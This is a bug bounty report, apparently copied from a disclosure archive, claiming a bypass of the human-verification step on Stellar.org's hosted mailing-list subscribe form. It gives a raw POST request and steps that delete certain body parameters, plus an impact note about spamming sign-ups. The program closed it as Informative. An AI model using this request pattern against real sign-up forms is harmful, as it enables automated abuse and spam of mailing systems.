Loading HuntDB...

Bypassing Verify Humans Page

None
S
Stellar.org
Submitted None
Reported by suvrat7

Vulnerability Details

Technical details and impact analysis

Improper Authentication - Generic
Hi Team, I was able to bypass verify Human dialog Box , while subscribing . Vulnerable request: ==================== ``` POST /subscribe/post HTTP/1.1 Host: stellar.us9.list-manage.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 264 Referer: https://stellar.us9.list-manage.com/subscribe/post?u=c001d97369b7a10d224c23867&id=563f658d41&SIGNUP=community Cookie: _AVESTA_ENVIRONMENT=prod; PHPSESSID=5kid70ckbbvfpshmvoc6m7vqr1 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 u=c001d97369b7a10d224c23867&id=563f658d41&b_name=&b_email=&b_comment=&MERGE0=codelover16%40gmail.com&MERGE1=su&MERGE2=ascas&group%5B17489%5D%5B1%5D=1&submit=Subscribe+to+list&ht=8cad8bee67974ea68255fd9b15685974905f31d8%3AMTQ5ODMwMTUyNS43ODA4&mc_signupsource=hosted ``` Steps to reproduce: ==================== 1. Delete Body param ``` &MERGE1=su&MERGE2=ascas&group%5B17489%5D%5B1%5D=1&submit=Subscribe+to+list&ht=8cad8bee67974ea68255fd9b15685974905f31d8%3AMTQ5ODMwMTUyNS43ODA4&mc_signupsource=hosted ``` 2 . And you will be able to bypass human authentication Impact ==================== 1. This request can be brute forced , which can result to Bringing down and Spamming the Email server. 2. I was able to verify multiple accounts by changing **MERGE0** with different email addresses using same **u=** and **id=** param. Thanks, Suvrat(codelover16)

Report Details

Additional information and metadata

State

Closed

Substate

Informative

Submitted

Weakness

Improper Authentication - Generic